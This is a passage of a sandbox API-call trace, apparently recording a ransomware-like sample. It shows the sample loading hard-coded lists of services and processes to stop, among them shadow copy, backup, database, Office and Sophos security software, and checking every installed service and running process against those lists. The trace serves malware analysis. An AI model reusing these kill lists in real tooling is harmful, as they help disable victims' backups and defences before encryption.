ServiceStatus.dwCheckPoint=0x0, ServiceStatus.dwWaitHint=0x0), pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64) returned 1 [0219.713] lstrcpyA (in: lpString1=0x553f9c0, lpString2="vss,sql,memtas,mepocs,sophos,veeam,backup,pulseway,logme,logmein,connectwise,splashtop,mysql,Dfs,vmms,vmcompute,Hyper-v" | out: lpString1="vss,sql,memtas,mepocs,sophos,veeam,backup,pulseway,logme,logmein,connectwise,splashtop,mysql,Dfs,vmms,vmcompute,Hyper-v") returned="vss,sql,memtas,mepocs,sophos,veeam,backup,pulseway,logme,logmein,connectwise,splashtop,mysql,Dfs,vmms,vmcompute,Hyper-v" [0219.713] StrStrIA (lpFirst="1394ohci", lpSrch="vss") returned 0x0 [0219.713] StrStrIA (lpFirst="3ware", lpSrch="vss") returned 0x0 [0219.713] StrStrIA (lpFirst="ACPI", lpSrch="vss") returned 0x0 [0219.713] StrStrIA (lpFirst="AcpiDev", lpSrch="vss") returned 0x0 [0219.713] StrStrIA (lpFirst="acpiex", lpSrch="vss") returned 0x0 [0219.713] StrStrIA (lpFirst="acpipagr", lpSrch="vss") returned 0x0 [0219.713] StrStrIA (lpFirst="AcpiPmi", lpSrch="vss") returned 0x0 [0219.713] StrStrIA (lpFirst="acpitime", lpSrch="vss") returned 0x0 [0219.713] StrStrIA (lpFirst="AdobeARMservice", lpSrch="vss") returned 0x0 [0219.713] StrStrIA (lpFirst="ADP80XX", lpSrch="vss") returned 0x0 [0219.713] StrStrIA (lpFirst="AFD", lpSrch="vss") returned 0x0 [0219.713] StrStrIA (lpFirst="ahcache", lpSrch="vss") returned 0x0 [0219.713] StrStrIA (lpFirst="AJRouter", lpSrch="vss") returned 0x0 [0219.713] StrStrIA (lpFirst="ALG", lpSrch="vss") returned 0x0 [0219.714] StrStrIA (lpFirst="AmdK8", lpSrch="vss") returned 0x0 [0219.714] StrStrIA (lpFirst="AmdPPM", lpSrch="vss") returned 0x0 [0219.714] StrStrIA (lpFirst="amdsata", lpSrch="vss") returned 0x0 [0219.714] StrStrIA (lpFirst="amdsbs", lpSrch="vss") returned 0x0 [0219.714] StrStrIA (lpFirst="amdxata", lpSrch="vss") returned 0x0 [0219.714] StrStrIA (lpFirst="AppID", lpSrch="vss") returned 0x0 [0219.714] StrStrIA (lpFirst="AppIDSvc", lpSrch="vss") returned 0x0 [0219.714] StrStrIA (lpFirst="Appinfo", lpSrch="vss") returned 0x0 [0219.714] StrStrIA (lpFirst="applockerfltr", lpSrch="vss") returned 0x0 [0219.714] StrStrIA (lpFirst="AppMgmt", lpSrch="vss") returned 0x0 [0219.714] StrStrIA (lpFirst="AppReadiness", lpSrch="vss") returned 0x0 [0219.714] StrStrIA (lpFirst="AppVClient", lpSrch="vss") returned 0x0 [0219.714] StrStrIA (lpFirst="AppvStrm", lpSrch="vss") returned 0x0 [0219.714] StrStrIA (lpFirst="AppvVemgr", lpSrch="vss") returned 0x0 [0219.714] StrStrIA (lpFirst="AppvVfs", lpSrch="vss") returned 0x0 [0219.714] StrStrIA (lpFirst="AppXSvc", lpSrch="vss") returned 0x0 [0219.714] StrStrIA (lpFirst="arcsas", lpSrch="vss") returned 0x0 [0219.714] StrStrIA (lpFirst="AsyncMac", lpSrch="vss") returned 0x0 [0219.714] StrStrIA (lpFirst="atapi", lpSrch="vss") returned 0x0 [0219.714] StrStrIA (lpFirst="AudioEndpointBuilder", lpSrch="vss") returned 0x0 [0219.714] StrStrIA (lpFirst="Audiosrv", lpSrch="vss") returned 0x0 [0219.714] StrStrIA (lpFirst="AxInstSV", lpSrch="vss") returned 0x0 [0219.714] StrStrIA (lpFirst="b06bdrv", lpSrch="vss") returned 0x0 [0219.714] StrStrIA (lpFirst="BasicDisplay", lpSrch="vss") returned 0x0 [0219.714] StrStrIA (lpFirst="BasicRender", lpSrch="vss") returned 0x0 [0219.714] StrStrIA (lpFirst="bcmfn", lpSrch="vss") returned 0x0 [0219.714] StrStrIA (lpFirst="bcmfn2", lpSrch="vss") returned 0x0 [0219.714] StrStrIA (lpFirst="BDESVC", lpSrch="vss") returned 0x0 [0219.714] StrStrIA (lpFirst="Beep", lpSrch="vss") returned 0x0 [0219.715] StrStrIA (lpFirst="BFE", lpSrch="vss") returned 0x0 [0219.715] StrStrIA (lpFirst="BITS", lpSrch="vss") returned 0x0 [0219.715] StrStrIA (lpFirst="bowser", lpSrch="vss") returned 0x0 [0219.715] StrStrIA (lpFirst="BrokerInfrastructure", lpSrch="vss") returned 0x0 [0219.715] StrStrIA (lpFirst="Browser", lpSrch="vss") returned 0x0 [0219.715] StrStrIA (lpFirst="BthAvrcpTg", lpSrch="vss") returned 0x0 [0219.715] StrStrIA (lpFirst="BthHFEnum", lpSrch="vss") returned 0x0 [0219.715] StrStrIA (lpFirst="bthhfhid", lpSrch="vss") returned 0x0 [0219.715] StrStrIA (lpFirst="BthHFSrv", lpSrch="vss") returned 0x0 [0219.715] StrStrIA (lpFirst="BTHMODEM", lpSrch="vss") returned 0x0 [0219.715] StrStrIA (lpFirst="bthserv", lpSrch="vss") returned 0x0 [0219.715] StrStrIA (lpFirst="buttonconverter", lpSrch="vss") returned 0x0 [0219.715] StrStrIA (lpFirst="CAD", lpSrch="vss") returned 0x0 [0219.715] StrStrIA (lpFirst="CapImg", lpSrch="vss") returned 0x0 [0219.715] StrStrIA (lpFirst="cdfs", lpSrch="vss") returned 0x0 [0219.715] StrStrIA (lpFirst="CDPSvc", lpSrch="vss") returned 0x0 [0219.715] StrStrIA (lpFirst="cdrom", lpSrch="vss") returned 0x0 [0219.715] StrStrIA (lpFirst="CertPropSvc", lpSrch="vss") returned 0x0 [0219.715] StrStrIA (lpFirst="cht4iscsi", lpSrch="vss") returned 0x0 [0219.715] StrStrIA (lpFirst="cht4vbd", lpSrch="vss") returned 0x0 [0219.715] StrStrIA (lpFirst="circlass", lpSrch="vss") returned 0x0 [0219.715] StrStrIA (lpFirst="CldFlt", lpSrch="vss") returned 0x0 [0219.715] StrStrIA (lpFirst="CLFS", lpSrch="vss") returned 0x0 [0219.715] StrStrIA (lpFirst="ClickToRunSvc", lpSrch="vss") returned 0x0 [0219.715] StrStrIA (lpFirst="ClipSVC", lpSrch="vss") returned 0x0 [0219.715] StrStrIA (lpFirst="clreg", lpSrch="vss") returned 0x0 [0219.715] StrStrIA (lpFirst="CmBatt", lpSrch="vss") returned 0x0 [0219.715] StrStrIA (lpFirst="CNG", lpSrch="vss") returned 0x0 [0219.716] StrStrIA (lpFirst="cnghwassist", lpSrch="vss") returned 0x0 [0219.716] StrStrIA (lpFirst="CompositeBus", lpSrch="vss") returned 0x0 [0219.716] StrStrIA (lpFirst="COMSysApp", lpSrch="vss") returned 0x0 [0219.716] StrStrIA (lpFirst="condrv", lpSrch="vss") returned 0x0 [0219.716] StrStrIA (lpFirst="CoreMessagingRegistrar", lpSrch="vss") returned 0x0 [0219.716] StrStrIA (lpFirst="CryptSvc", lpSrch="vss") returned 0x0 [0219.716] StrStrIA (lpFirst="CSC", lpSrch="vss") returned 0x0 [0219.716] StrStrIA (lpFirst="CscService", lpSrch="vss") returned 0x0 [0219.716] StrStrIA (lpFirst="dam", lpSrch="vss") returned 0x0 [0219.716] StrStrIA (lpFirst="DcomLaunch", lpSrch="vss") returned 0x0 [0219.716] StrStrIA (lpFirst="defragsvc", lpSrch="vss") returned 0x0 [0219.716] StrStrIA (lpFirst="DeviceAssociationService", lpSrch="vss") returned 0x0 [0219.716] StrStrIA (lpFirst="DeviceInstall", lpSrch="vss") returned 0x0 [0219.716] StrStrIA (lpFirst="DevQueryBroker", lpSrch="vss") returned 0x0 [0219.716] StrStrIA (lpFirst="Dfsc", lpSrch="vss") returned 0x0 [0219.716] StrStrIA (lpFirst="Dhcp", lpSrch="vss") returned 0x0 [0219.716] StrStrIA (lpFirst="diagnosticshub.standardcollector.service", lpSrch="vss") returned 0x0 [0219.716] StrStrIA (lpFirst="DiagTrack", lpSrch="vss") returned 0x0 [0219.716] StrStrIA (lpFirst="Disk", lpSrch="vss") returned 0x0 [0219.716] StrStrIA (lpFirst="DmEnrollmentSvc", lpSrch="vss") returned 0x0 [0219.716] StrStrIA (lpFirst="dmvsc", lpSrch="vss") returned 0x0 [0219.716] StrStrIA (lpFirst="dmwappushservice", lpSrch="vss") returned 0x0 [0219.716] StrStrIA (lpFirst="Dnscache", lpSrch="vss") returned 0x0 [0219.716] StrStrIA (lpFirst="DoSvc", lpSrch="vss") returned 0x0 [0219.716] StrStrIA (lpFirst="dot3svc", lpSrch="vss") returned 0x0 [0219.716] StrStrIA (lpFirst="DPS", lpSrch="vss") returned 0x0 [0219.716] StrStrIA (lpFirst="drmkaud", lpSrch="vss") returned 0x0 [0219.716] StrStrIA (lpFirst="DsmSvc", lpSrch="vss") returned 0x0 [0219.717] StrStrIA (lpFirst="DsSvc", lpSrch="vss") returned 0x0 [0219.717] StrStrIA (lpFirst="DusmSvc", lpSrch="vss") returned 0x0 [0219.717] StrStrIA (lpFirst="DXGKrnl", lpSrch="vss") returned 0x0 [0219.717] StrStrIA (lpFirst="e1iexpress", lpSrch="vss") returned 0x0 [0219.717] StrStrIA (lpFirst="EapHost", lpSrch="vss") returned 0x0 [0219.717] StrStrIA (lpFirst="ebdrv", lpSrch="vss") returned 0x0 [0219.717] StrStrIA (lpFirst="EFS", lpSrch="vss") returned 0x0 [0219.717] StrStrIA (lpFirst="EhStorClass", lpSrch="vss") returned 0x0 [0219.717] StrStrIA (lpFirst="EhStorTcgDrv", lpSrch="vss") returned 0x0 [0219.717] StrStrIA (lpFirst="embeddedmode", lpSrch="vss") returned 0x0 [0219.717] StrStrIA (lpFirst="EntAppSvc", lpSrch="vss") returned 0x0 [0219.717] StrStrIA (lpFirst="ErrDev", lpSrch="vss") returned 0x0 [0219.717] StrStrIA (lpFirst="EventLog", lpSrch="vss") returned 0x0 [0219.717] StrStrIA (lpFirst="EventSystem", lpSrch="vss") returned 0x0 [0219.717] StrStrIA (lpFirst="exfat", lpSrch="vss") returned 0x0 [0219.717] StrStrIA (lpFirst="fastfat", lpSrch="vss") returned 0x0 [0219.717] StrStrIA (lpFirst="Fax", lpSrch="vss") returned 0x0 [0219.717] StrStrIA (lpFirst="fdc", lpSrch="vss") returned 0x0 [0219.717] StrStrIA (lpFirst="fdPHost", lpSrch="vss") returned 0x0 [0219.717] StrStrIA (lpFirst="FDResPub", lpSrch="vss") returned 0x0 [0219.717] StrStrIA (lpFirst="fhsvc", lpSrch="vss") returned 0x0 [0219.718] StrStrIA (lpFirst="FileCrypt", lpSrch="vss") returned 0x0 [0219.718] StrStrIA (lpFirst="FileInfo", lpSrch="vss") returned 0x0 [0219.718] StrStrIA (lpFirst="Filetrace", lpSrch="vss") returned 0x0 [0219.718] StrStrIA (lpFirst="flpydisk", lpSrch="vss") returned 0x0 [0219.718] StrStrIA (lpFirst="FltMgr", lpSrch="vss") returned 0x0 [0219.718] StrStrIA (lpFirst="FontCache", lpSrch="vss") returned 0x0 [0219.718] StrStrIA (lpFirst="FontCache3.0.0.0", lpSrch="vss") returned 0x0 [0219.718] StrStrIA (lpFirst="FrameServer", lpSrch="vss") returned 0x0 [0219.718] StrStrIA (lpFirst="FsDepends", lpSrch="vss") returned 0x0 [0219.718] StrStrIA (lpFirst="fvevol", lpSrch="vss") returned 0x0 [0219.718] StrStrIA (lpFirst="gencounter", lpSrch="vss") returned 0x0 [0219.718] StrStrIA (lpFirst="genericusbfn", lpSrch="vss") returned 0x0 [0219.718] StrStrIA (lpFirst="GPIOClx0101", lpSrch="vss") returned 0x0 [0219.718] StrStrIA (lpFirst="gpsvc", lpSrch="vss") returned 0x0 [0219.718] StrStrIA (lpFirst="GpuEnergyDrv", lpSrch="vss") returned 0x0 [0219.718] StrStrIA (lpFirst="gupdate", lpSrch="vss") returned 0x0 [0219.718] StrStrIA (lpFirst="gupdatem", lpSrch="vss") returned 0x0 [0219.718] StrStrIA (lpFirst="HdAudAddService", lpSrch="vss") returned 0x0 [0219.718] StrStrIA (lpFirst="HDAudBus", lpSrch="vss") returned 0x0 [0219.718] StrStrIA (lpFirst="HidBatt", lpSrch="vss") returned 0x0 [0219.718] StrStrIA (lpFirst="HidBth", lpSrch="vss") returned 0x0 [0219.718] StrStrIA (lpFirst="hidi2c", lpSrch="vss") returned 0x0 [0219.718] StrStrIA (lpFirst="hidinterrupt", lpSrch="vss") returned 0x0 [0219.718] StrStrIA (lpFirst="HidIr", lpSrch="vss") returned 0x0 [0219.718] StrStrIA (lpFirst="hidserv", lpSrch="vss") returned 0x0 [0219.718] StrStrIA (lpFirst="HidUsb", lpSrch="vss") returned 0x0 [0219.718] StrStrIA (lpFirst="HomeGroupListener", lpSrch="vss") returned 0x0 [0219.718] StrStrIA (lpFirst="HomeGroupProvider", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="HpSAMD", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="HTTP", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="HvHost", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="hvservice", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="hwpolicy", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="hyperkbd", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="i8042prt", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="iagpio", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="iai2c", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="iaLPSS2i_GPIO2", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="iaLPSS2i_GPIO2_BXT_P", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="iaLPSS2i_I2C", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="iaLPSS2i_I2C_BXT_P", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="iaLPSSi_GPIO", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="iaLPSSi_I2C", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="iaStorAV", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="iaStorV", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="ibbus", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="icssvc", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="IKEEXT", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="IndirectKmd", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="intelide", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="intelpep", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="intelppm", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="iorate", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="IpFilterDriver", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="iphlpsvc", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="IPMIDRV", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="IPNAT", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="IpxlatCfgSvc", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="irda", lpSrch="vss") returned 0x0 [0219.719] StrStrIA (lpFirst="IRENUM", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="irmon", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="isapnp", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="iScsiPrt", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="kbdclass", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="kbdhid", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="kdnic", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="KeyIso", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="KSecDD", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="KSecPkg", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="ksthunk", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="KtmRm", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="LanmanServer", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="LanmanWorkstation", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="lfsvc", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="LicenseManager", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="lltdio", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="lltdsvc", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="lmhosts", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="LSI_SAS", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="LSI_SAS2i", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="LSI_SAS3i", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="LSI_SSS", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="LSM", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="luafv", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="MapsBroker", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="mausbhost", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="mausbip", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="megasas", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="megasas2i", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="megasr", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="mlx4_bus", lpSrch="vss") returned 0x0 [0219.720] StrStrIA (lpFirst="MMCSS", lpSrch="vss") returned 0x0 [0219.721] StrStrIA (lpFirst="Modem", lpSrch="vss") returned 0x0 [0219.721] StrStrIA (lpFirst="monitor", lpSrch="vss") returned 0x0 [0219.721] StrStrIA (lpFirst="mouclass", lpSrch="vss") returned 0x0 [0219.721] StrStrIA (lpFirst="mouhid", lpSrch="vss") returned 0x0 [0219.721] StrStrIA (lpFirst="mountmgr", lpSrch="vss") returned 0x0 [0219.721] StrStrIA (lpFirst="MozillaMaintenance", lpSrch="vss") returned 0x0 [0219.721] StrStrIA (lpFirst="mpsdrv", lpSrch="vss") returned 0x0 [0219.721] StrStrIA (lpFirst="MpsSvc", lpSrch="vss") returned 0x0 [0219.721] StrStrIA (lpFirst="MRxDAV", lpSrch="vss") returned 0x0 [0219.721] StrStrIA (lpFirst="mrxsmb", lpSrch="vss") returned 0x0 [0219.721] StrStrIA (lpFirst="mrxsmb10", lpSrch="vss") returned 0x0 [0219.721] StrStrIA (lpFirst="mrxsmb20", lpSrch="vss") returned 0x0 [0219.721] StrStrIA (lpFirst="MsBridge", lpSrch="vss") returned 0x0 [0219.721] StrStrIA (lpFirst="MSDTC", lpSrch="vss") returned 0x0 [0219.721] StrStrIA (lpFirst="Msfs", lpSrch="vss") returned 0x0 [0219.721] StrStrIA (lpFirst="msgpiowin32", lpSrch="vss") returned 0x0 [0219.721] StrStrIA (lpFirst="mshidkmdf", lpSrch="vss") returned 0x0 [0219.721] StrStrIA (lpFirst="mshidumdf", lpSrch="vss") returned 0x0 [0219.721] StrStrIA (lpFirst="msisadrv", lpSrch="vss") returned 0x0 [0219.721] StrStrIA (lpFirst="MSiSCSI", lpSrch="vss") returned 0x0 [0219.721] StrStrIA (lpFirst="msiserver", lpSrch="vss") returned 0x0 [0219.721] StrStrIA (lpFirst="MSKSSRV", lpSrch="vss") returned 0x0 [0219.721] StrStrIA (lpFirst="MsLldp", lpSrch="vss") returned 0x0 [0219.721] StrStrIA (lpFirst="MSPCLOCK", lpSrch="vss") returned 0x0 [0219.721] StrStrIA (lpFirst="MSPQM", lpSrch="vss") returned 0x0 [0219.721] StrStrIA (lpFirst="MsRPC", lpSrch="vss") returned 0x0 [0219.721] StrStrIA (lpFirst="MsSecFlt", lpSrch="vss") returned 0x0 [0219.721] StrStrIA (lpFirst="mssmbios", lpSrch="vss") returned 0x0 [0219.722] StrStrIA (lpFirst="MSTEE", lpSrch="vss") returned 0x0 [0219.722] StrStrIA (lpFirst="MTConfig", lpSrch="vss") returned 0x0 [0219.722] StrStrIA (lpFirst="Mup", lpSrch="vss") returned 0x0 [0219.722] StrStrIA (lpFirst="mvumis", lpSrch="vss") returned 0x0 [0219.722] StrStrIA (lpFirst="NativeWifiP", lpSrch="vss") returned 0x0 [0219.722] StrStrIA (lpFirst="NaturalAuthentication", lpSrch="vss") returned 0x0 [0219.722] StrStrIA (lpFirst="NcaSvc", lpSrch="vss") returned 0x0 [0219.722] StrStrIA (lpFirst="NcbService", lpSrch="vss") returned 0x0 [0219.722] StrStrIA (lpFirst="NcdAutoSetup", lpSrch="vss") returned 0x0 [0219.723] OpenServiceA (hSCManager=0x3585850, lpServiceName="vmicvss", dwDesiredAccess=0x2c) returned 0x3586430 [0219.723] QueryServiceStatusEx (in: hService=0x3586430, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0219.724] CloseServiceHandle (hSCObject=0x3586430) returned 1 [0219.725] OpenServiceA (hSCManager=0x3585850, lpServiceName="VSS", dwDesiredAccess=0x2c) returned 0x3586160 [0219.725] QueryServiceStatusEx (in: hService=0x3586160, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0219.726] CloseServiceHandle (hSCObject=0x3586160) returned 1 [0219.735] OpenServiceA (hSCManager=0x3585850, lpServiceName="cdfs", dwDesiredAccess=0x2c) Thread: id = 6 os_tid = 0xd64 [0091.093] lstrcpyA (in: lpString1=0x567f090, lpString2="sql,mysql,veeam,oracle,ocssd,dbsnmp,synctime,agntsvc,isqlplussvc,xfssvccon,mydesktopservice,ocautoupds,encsvc,firefox,tbirdconfig,mydesktopqos,ocomm,dbeng50,sqbcoreservice,excel,infopath,msaccess,mspub,onenote,outlook,powerpnt,steam,thebat,thunderbird,visio,winword,wordpad,EduLink2SIMS,bengine,benetns,beserver,pvlsvr,beremote,VxLockdownServer,postgres,fdhost,WSSADMIN,wsstracing,OWSTIMER,dfssvc.exe,dfsrs.exe,swc_service.exe,sophos,SAVAdminService,SavService.exe,Hyper-v" | out: lpString1="sql,mysql,veeam,oracle,ocssd,dbsnmp,synctime,agntsvc,isqlplussvc,xfssvccon,mydesktopservice,ocautoupds,encsvc,firefox,tbirdconfig,mydesktopqos,ocomm,dbeng50,sqbcoreservice,excel,infopath,msaccess,mspub,onenote,outlook,powerpnt,steam,thebat,thunderbird,visio,winword,wordpad,EduLink2SIMS,bengine,benetns,beserver,pvlsvr,beremote,VxLockdownServer,postgres,fdhost,WSSADMIN,wsstracing,OWSTIMER,dfssvc.exe,dfsrs.exe,swc_service.exe,sophos,SAVAdminService,SavService.exe,Hyper-v") returned="sql,mysql,veeam,oracle,ocssd,dbsnmp,synctime,agntsvc,isqlplussvc,xfssvccon,mydesktopservice,ocautoupds,encsvc,firefox,tbirdconfig,mydesktopqos,ocomm,dbeng50,sqbcoreservice,excel,infopath,msaccess,mspub,onenote,outlook,powerpnt,steam,thebat,thunderbird,visio,winword,wordpad,EduLink2SIMS,bengine,benetns,beserver,pvlsvr,beremote,VxLockdownServer,postgres,fdhost,WSSADMIN,wsstracing,OWSTIMER,dfssvc.exe,dfsrs.exe,swc_service.exe,sophos,SAVAdminService,SavService.exe,Hyper-v" [0091.094] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x358 [0091.119] Process32FirstW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0091.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0091.120] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x355b478 [0091.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x355b478, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0091.120] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0091.120] StrStrIA (lpFirst="[System Process]", lpSrch="sql") returned 0x0 [0091.120] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0091.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0091.121] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3547828 [0091.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3547828, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0091.122] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0091.122] StrStrIA (lpFirst="System", lpSrch="sql") returned 0x0 [0091.122] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0091.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0091.123] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35592f8 [0091.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x35592f8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0091.123] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0091.123] StrStrIA (lpFirst="smss.exe", lpSrch="sql") returned 0x0 [0091.123] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0091.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.124] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35593b8 [0091.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x35593b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0091.124] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0091.124] StrStrIA (lpFirst="csrss.exe", lpSrch="sql") returned 0x0 [0091.124] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0091.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 